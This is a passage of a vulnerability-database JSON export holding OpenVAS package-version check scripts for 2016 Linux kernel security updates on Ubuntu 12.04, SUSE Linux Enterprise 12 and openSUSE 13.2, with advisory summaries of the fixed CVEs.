"CVE-2016-2546", "CVE-2015-7566", "CVE-2016-2549", "CVE-2015-1805"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842741", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842741", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux USN-2967-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842741\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-05-10 05:21:24 +0200 (Tue, 10 May 2016)\");\n script_cve_id(\"CVE-2013-4312\", \"CVE-2015-7515\", \"CVE-2015-7566\", \"CVE-2015-7833\",\n \t\t\"CVE-2015-8767\", \"CVE-2015-8812\", \"CVE-2016-0723\", \"CVE-2015-1805\",\n \t\t\"CVE-2016-0774\", \"CVE-2016-0821\", \"CVE-2016-2069\", \"CVE-2016-2543\",\n \t\t\"CVE-2016-2544\", \"CVE-2016-2545\", \"CVE-2016-2546\", \"CVE-2016-2547\",\n\t \t\"CVE-2016-2548\", \"CVE-2016-2549\", \"CVE-2016-2782\", \"CVE-2016-2847\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-2967-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that the Linux kernel did\n not properly enforce rlimits for file descriptors sent over UNIX domain sockets.\n A local attacker could use this to cause a denial of service. (CVE-2013-4312)\n\n Ralf Spenneberg discovered that the Aiptek Tablet USB device driver in the\n Linux kernel did not properly sanity check the endpoints reported by the\n device. An attacker with physical access could cause a denial of service\n (system crash). (CVE-2015-7515)\n\n Ralf Spenneberg discovered that the USB driver for Clie devices in the\n Linux kernel did not properly sanity check the endpoints reported by the\n device. An attacker with physical access could cause a denial of service\n (system crash). (CVE-2015-7566)\n\n Ralf Spenneberg discovered that the usbvision driver in the Linux kernel\n did not properly sanity check the interfaces and endpoints reported by the\n device. An attacker with physical access could cause a denial of service\n (system crash). (CVE-2015-7833)\n\n It was discovered that a race condition existed when handling heartbeat-\n timeout events in the SCTP implementation of the Linux kernel. A remote\n attacker could use this to cause a denial of service. (CVE-2015-8767)\n\n Venkatesh Pottem discovered a use-after-free vulnerability in the Linux\n kernel's CXGB3 driver. A local attacker could use this to cause a denial of\n service (system crash) or possibly execute arbitrary code. (CVE-2015-8812)\n\n It was discovered that a race condition existed in the ioctl handler for\n the TTY driver in the Linux kernel. A local attacker could use this to\n cause a denial of service (system crash) or expose sensitive information.\n (CVE-2016-0723)\n\n It was discovered that the Linux kernel did not keep accurate track of pipe\n buffer details when error conditions occurred, due to an incomplete fix for\n CVE-2015-1805. A local attacker could use this to cause a denial of service\n (system crash) or possibly execute arbitrary code with administrative\n privileges. (CVE-2016-0774)\n\n Zach Riggle discovered that the Linux kernel's list poison feature did not\n take into account the mmap_min_addr value. A local attacker could use this\n to bypass the kernel's poison-pointer protection mechanism while attempting\n to exploit an existing kernel vulnerability. (CVE-2016-0821)\n\n Andy Lutomirski discovered a race condition in the Linux kernel's\n translation lookaside buffer (TLB) handling of flush events. A local\n attacker could use this to cause a denial of service or possibly leak\n sensitive information. (CVE-2016-2069)\n\n Dmitry Vyukov discovered that the Advanced Linux Sound Architecture (ALSA)\n framework did not verify that a FIFO was attached to a client bef ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"2967-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2967-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-102-generic\", ver:\"3.2.0-102.142\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-102-generic-pae\", ver:\"3.2.0-102.142\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-102-highbank\", ver:\"3.2.0-102.142\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-102-omap\", ver:\"3.2.0-102.142\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-102-powerpc-smp\", ver:\"3.2.0-102.142\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-102-powerpc64-smp\", ver:\"3.2.0-102.142\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-102-virtual\", ver:\"3.2.0-102.142\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:35:21", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-06-28T00:00:00", "type": "openvas", "title": "SUSE: Security Advisory for kernel (SUSE-SU-2016:1690-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2782", "CVE-2016-5244", "CVE-2016-2053", "CVE-2016-3689", "CVE-2016-2847", "CVE-2016-3139", "CVE-2016-4486", "CVE-2016-2186", "CVE-2016-3156", "CVE-2016-0758", "CVE-2016-4569", "CVE-2016-2184", "CVE-2016-3951", "CVE-2016-3137", "CVE-2014-9717", "CVE-2016-4482", "CVE-2016-3136", "CVE-2016-3138", "CVE-2016-3140", "CVE-2016-2143", "CVE-2016-4578", "CVE-2015-8816", "CVE-2016-2185", "CVE-2016-4805", "CVE-2016-4565", "CVE-2015-8845", "CVE-2016-3672", "CVE-2016-3134", "CVE-2016-2188"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851358", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851358", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851358\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-06-28 05:27:13 +0200 (Tue, 28 Jun 2016)\");\n script_cve_id(\"CVE-2014-9717\", \"CVE-2015-8816\", \"CVE-2015-8845\", \"CVE-2016-0758\",\n \"CVE-2016-2053\", \"CVE-2016-2143\", \"CVE-2016-2184\", \"CVE-2016-2185\",\n \"CVE-2016-2186\", \"CVE-2016-2188\", \"CVE-2016-2782\", \"CVE-2016-2847\",\n \"CVE-2016-3134\", \"CVE-2016-3136\", \"CVE-2016-3137\", \"CVE-2016-3138\",\n \"CVE-2016-3139\", \"CVE-2016-3140\", \"CVE-2016-3156\", \"CVE-2016-3672\",\n \"CVE-2016-3689\", \"CVE-2016-3951\", \"CVE-2016-4482\", \"CVE-2016-4486\",\n \"CVE-2016-4565\", \"CVE-2016-4569\", \"CVE-2016-4578\", \"CVE-2016-4805\",\n \"CVE-2016-5244\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for kernel (SUSE-SU-2016:1690-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The SUSE Linux Enterprise 12 kernel was updated to 3.12.60 to receive\n various security and bugfixes.\n\n The following security bugs were fixed:\n\n - CVE-2014-9717: fs/namespace.c in the Linux kernel processes MNT_DETACH\n umount2 system called without verifying that the MNT_LOCKED flag is\n unset, which allowed local users to bypass intended access restrictions\n and navigate to filesystem locations beneath a mount by calling umount2\n within a user namespace (bnc#928547).\n\n - CVE-2015-8816: The hub_activate function in drivers/usb/core/hub.c in\n the Linux kernel did not properly maintain a hub-interface data\n structure, which allowed physically proximate attackers to cause a\n denial of service (invalid memory access and system crash) or possibly\n have unspecified other impact by unplugging a USB hub device\n (bnc#968010).\n\n - CVE-2015-8845: The tm_reclaim_thread function in\n arch/powerpc/kernel/process.c in the Linux kernel on powerpc platforms\n did not ensure that TM suspend mode exists before proceeding with a\n tm_reclaim call, which allowed local users to cause a denial of service\n (TM Bad Thing exception and panic) via a crafted application\n (bnc#975533).\n\n - CVE-2016-0758: Fix ASN.1 indefinite length object parsing (bsc#979867).\n\n - CVE-2016-2053: The asn1_ber_decoder function in lib/asn1_decoder.c in\n the Linux kernel allowed attackers to cause a denial of service (panic)\n via an ASN.1 BER file that lacks a public key, leading to mishandling by\n the public_key_verify_signature function in\n crypto/asymmetric_keys/public_key.c (bnc#963762).\n\n - CVE-2016-2143: The fork implementation in the Linux kernel on s390\n platforms mishandled the case of four page-table levels, which allowed\n local users to cause a denial of service (system crash) or possibly have\n unspecified other impact via a crafted application, related to\n arch/s390/include/asm/mmu_context.h and arch/s390/include/asm/pgalloc.h.\n (bnc#970504)\n\n - CVE-2016-2184: The create_fixed_stream_quirk function in\n sound/usb/quirks.c in the snd-usb-audio driver in the Linux kernel\n allowed physically proximate attackers to cause a denial of service\n (NULL pointer dereference or double free, and system crash) via a\n crafted endpoints value in a USB device descriptor (bnc#971125).\n\n - CVE-2016-2185: The ati_remote2_probe function in\n drivers/input/misc/ati_remote2.c in the Linux kernel allowed physically\n proximate attackers to cause a denial of service (NULL pointer\n dereference and system crash) via a crafted endpoints value in a USB\n device descriptor (bnc#9711 ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n\n script_tag(name:\"affected\", value:\"kernel on SUSE Linux Enterprise Server 12, SUSE Linux Enterprise Desktop 12\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"SUSE-SU\", value:\"2016:1690-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(SLED12\\.0SP0|SLES12\\.0SP0)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~3.12.60~52.49.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~3.12.60~52.49.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~3.12.60~52.49.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~3.12.60~52.49.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-extra\", rpm:\"kernel-default-extra~3.12.60~52.49.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-extra-debuginfo\", rpm:\"kernel-default-extra-debuginfo~3.12.60~52.49.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~3.12.60~52.49.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~3.12.60~52.49.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~3.12.60~52.49.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debugsource\", rpm:\"kernel-xen-debugsource~3.12.60~52.49.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~3.12.60~52.49.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.12.60~52.49.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-macros\", rpm:\"kernel-macros~3.12.60~52.49.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~3.12.60~52.49.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"SLES12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~3.12.60~52.49.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~3.12.60~52.49.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base-debuginfo\", rpm:\"kernel-default-base-debuginfo~3.12.60~52.49.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~3.12.60~52.49.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~3.12.60~52.49.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~3.12.60~52.49.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~3.12.60~52.49.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.12.60~52.49.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-macros\", rpm:\"kernel-macros~3.12.60~52.49.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~3.12.60~52.49.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~3.12.60~52.49.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base\", rpm:\"kernel-xen-base~3.12.60~52.49.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base-debuginfo\", rpm:\"kernel-xen-base-debuginfo~3.12.60~52.49.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~3.12.60~52.49.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debugsource\", rpm:\"kernel-xen-debugsource~3.12.60~52.49.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~3.12.60~52.49.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-man\", rpm:\"kernel-default-man~3.12.60~52.49.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-14T18:56:44", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-08-25T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for kernel (openSUSE-SU-2016:2144-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2384", "CVE-2016-2782", "CVE-2016-5244", "CVE-2016-2543", "CVE-2015-3288", "CVE-2016-4913", "CVE-2016-4581", "CVE-2016-2053", "CVE-2016-3689", "CVE-2016-2847", "CVE-2016-2548", "CVE-2016-3139", "CVE-2016-4486", "CVE-2016-2186", "CVE-2014-9904", "CVE-2016-2187", "CVE-2015-6526", "CVE-2016-2547", "CVE-2016-3156", "CVE-2016-1583", "CVE-2016-0758", "CVE-2015-8812", "CVE-2016-2544", "CVE-2016-4569", "CVE-2016-2184", "CVE-2015-8830", "CVE-2012-6701", "CVE-2016-3951", "CVE-2016-3137", "CVE-2016-5829", "CVE-2016-4485", "CVE-2016-4997", "CVE-2016-2545", "CVE-2016-4482", "CVE-2016-3136", "CVE-2016-3138", "CVE-2016-3140", "CVE-2016-2546", "CVE-2015-7566", "CVE-2016-2549", "CVE-2016-4578", "CVE-2015-8816", "CVE-2016-2185", "CVE-2016-4805", "CVE-2013-7446", "CVE-2016-4470", "CVE-2015-8709", "CVE-2016-4565", "CVE-2016-4580", "CVE-2016-3672", "CVE-2015-8785", "CVE-2016-3134", "CVE-2016-2188"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851386", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851386", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851386\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-08-25 05:40:38 +0200 (Thu, 25 Aug 2016)\");\n script_cve_id(\"CVE-2012-6701\", \"CVE-2013-7446\", \"CVE-2014-9904\", \"CVE-2015-3288\",\n \"CVE-2015-6526\", \"CVE-2015-7566\", \"CVE-2015-8709\", \"CVE-2015-8785\",\n \"CVE-2015-8812\", \"CVE-2015-8816\", \"CVE-2015-8830\", \"CVE-2016-0758\",\n \"CVE-2016-1583\", \"CVE-2016-2053\", \"CVE-2016-2184\", \"CVE-2016-2185\",\n \"CVE-2016-2186\", \"CVE-2016-2187\", \"CVE-2016-2188\", \"CVE-2016-2384\",\n \"CVE-2016-2543\", \"CVE-2016-2544\", \"CVE-2016-2545\", \"CVE-2016-2546\",\n \"CVE-2016-2547\", \"CVE-2016-2548\", \"CVE-2016-2549\", \"CVE-2016-2782\",\n \"CVE-2016-2847\", \"CVE-2016-3134\", \"CVE-2016-3136\", \"CVE-2016-3137\",\n \"CVE-2016-3138\", \"CVE-2016-3139\", \"CVE-2016-3140\", \"CVE-2016-3156\",\n \"CVE-2016-3672\", \"CVE-2016-3689\", \"CVE-2016-3951\", \"CVE-2016-4470\",\n \"CVE-2016-4482\", \"CVE-2016-4485\", \"CVE-2016-4486\", \"CVE-2016-4565\",\n \"CVE-2016-4569\", \"CVE-2016-4578\", \"CVE-2016-4580\", \"CVE-2016-4581\",\n \"CVE-2016-4805\", \"CVE-2016-4913\", \"CVE-2016-4997\", \"CVE-2016-5244\",\n \"CVE-2016-5829\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for kernel (openSUSE-SU-2016:2144-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The openSUSE 13.2 kernel was updated to fix various bugs and security\n issues.\n\n The following security bugs were fixed:\n\n - CVE-2016-1583: Prevent the usage of mmap when the lower file system does\n not allow it. This could have lead to local privilege escalation when\n ecryptfs-utils was installed and /sbin/mount.ecryptfs_private was setuid\n (bsc#983143).\n\n - CVE-2016-4913: The get_rock_ridge_filename function in fs/isofs/rock.c\n in the Linux kernel mishandles NM (aka alternate name) entries\n containing \\0 characters, which allowed local users to obtain sensitive\n information from kernel memory or possibly have unspecified other impact\n via a crafted isofs filesystem (bnc#980725).\n\n - CVE-2016-4580: The x25_negotiate_facilities function in\n net/x25/x25_facilities.c in the Linux kernel did not properly initialize\n a certain data structure, which allowed attackers to obtain sensitive\n information from kernel stack memory via an X.25 Call Request\n (bnc#981267).\n\n - CVE-2016-0758: Tags with indefinite length could have corrupted pointers\n in asn1_find_indefinite_length (bsc#979867).\n\n - CVE-2016-2053: The asn1_ber_decoder function in lib/asn1_decoder.c in\n the Linux kernel allowed attackers to cause a denial of service (panic)\n via an ASN.1 BER file that lacks a public key, leading to mishandling by\n the public_key_verify_signature function in\n crypto/asymmetric_keys/public_key.c (bnc#963762).\n\n - CVE-2016-2187: The gtco_probe function in drivers/input/tablet/gtco.c in\n the Linux kernel allowed physically proximate attackers to cause a\n denial of service (NULL pointer dereference and system crash) via a\n crafted endpoints value in a USB device descriptor (bnc#971919 971944).\n\n - CVE-2016-4482: The proc_connectinfo function in drivers/usb/core/devio.c\n in the Linux kernel did not initialize a certain data structure, which\n allowed local users to obtain sensitive information from kernel stack\n memory via a crafted USBDEVFS_CONNECTINFO ioctl call (bnc#978401\n bsc#978445).\n\n - CVE-2016-4565: The InfiniBand (aka IB) stack in the Linux kernel\n incorrectly relies on the write system call, which allowed local users\n to cause a denial of service (kernel memory write operation) or possibly\n have unspecified other impact via a uAPI interface (bnc#979548\n bsc#980363).\n\n - CVE-2016-3672: The arch_pick_mmap_layout function in arch/x86/mm/mmap.c\n in the Linux kernel did not properly randomize the legacy base address,\n which made it easier for local users to defeat the intended restrictions\n on the ADDR_NO_RANDOMIZE flag, and bypass the ASLR protection mechanism\n for a setuid or ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n\n script_tag(name:\"affected\", value:\"kernel on openSUSE 13.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:2144-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.2\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.2\")\n{\n\n if(!isnull(res = isrpmvuln(pkg:\"bbswitch\", rpm:\"bbswitch~0.8~3.20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bbswitch-debugsource\", rpm:\"bbswitch-debugsource~0.8~3.20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bbswitch-kmp-default\", rpm:\"bbswitch-kmp-default~0.8_k3.16.7_42~3.20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bbswitch-kmp-default-debuginfo\", rpm:\"bbswitch-kmp-default-debuginfo~0.8_k3.16.7_42~3.20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bbswitch-kmp-desktop\", rpm:\"bbswitch-kmp-desktop~0.8_k3.16.7_42~3.20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bbswitch-kmp-desktop-debuginfo\", rpm:\"bbswitch-kmp-desktop-debuginfo~0.8_k3.16.7_42~3.20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bbswitch-kmp-xen\", rpm:\"bbswitch-kmp-xen~0.8_k3.16.7_42~3.20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bbswitch-kmp-xen-debuginfo\", rpm:\"bbswitch-kmp-xen-debuginfo~0.8_k3.16.7_42~3.20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop\", rpm:\"cloop~2.639~14.20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-debuginfo\", rpm:\"cloop-debuginfo~2.639~14.20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-debugsource\", rpm:\"cloop-debugsource~2.639~14.20.3\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-kmp-default\", 